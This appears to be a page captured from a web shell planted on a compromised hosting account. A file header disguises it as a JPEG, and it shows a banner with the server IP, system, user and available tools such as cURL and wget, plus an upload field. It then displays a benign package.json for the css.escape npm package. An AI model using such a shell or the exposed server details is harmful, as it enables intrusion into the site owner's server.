ÿØÿà JPEG ÿþ;
| Server IP : 68.65.120.201 / Your IP : 216.73.216.221 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/./taxhyuvu/nodevenv/public_html/dp_taxhelplines/10/lib/node_modules/css.escape/ |
Upload File : |
{
"_from": "css.escape@1.5.1",
"_id": "css.escape@1.5.1",
"_inBundle": false,
"_integrity": "sha512-YUifsXXuknHlUsmlgyY0PKzgPOr7/FjCePfHNt0jxm83wHZi44VDMQ7/fGNkjY3/jV1MC+1CmZbaHzugyeRtpg==",
"_location": "/css.escape",
"_phantomChildren": {},
"_requested": {
"type": "version",
"registry": true,
"raw": "css.escape@1.5.1",
"name": "css.escape",
"escapedName": "css.escape",
"rawSpec": "1.5.1",
"saveSpec": null,
"fetchSpec": "1.5.1"
},
"_requiredBy": [
"/@next/react-dev-overlay"
],
"_resolved": "https://registry.npmjs.org/css.escape/-/css.escape-1.5.1.tgz",
"_shasum": "42e27d4fa04ae32f931a4b4d4191fa9cddee97cb",
"_spec": "css.escape@1.5.1",
"_where": "/home/taxhyuvu/nodevenv/dp_taxhelplines/10/lib/node_modules/@next/react-dev-overlay",
"author": {
"name": "Mathias Bynens",
"url": "https://mathiasbynens.be/"
},
"bugs": {
"url": "https://github.com/mathiasbynens/CSS.escape/issues"
},
"bundleDependencies": false,
"deprecated": false,
"description": "A robust polyfill for the `CSS.escape` utility method as defined in CSSOM.",
"devDependencies": {
"coveralls": "^2.11.4",
"istanbul": "^0.4.1"
},
"files": [
"LICENSE-MIT.txt",
"css.escape.js"
],
"homepage": "https://mths.be/cssescape",
"keywords": [
"string",
"unicode",
"identifier",
"css",
"cssom",
"polyfill"
],
"license": "MIT",
"main": "css.escape.js",
"name": "css.escape",
"repository": {
"type": "git",
"url": "git+https://github.com/mathiasbynens/CSS.escape.git"
},
"scripts": {
"cover": "istanbul cover --report html --verbose --dir coverage tests/tests.js",
"coveralls": "istanbul cover --verbose --dir coverage tests/tests.js && coveralls < coverage/lcov.info; rm -rf coverage/lcov*",
"test": "node tests/tests.js"
},
"version": "1.5.1"
}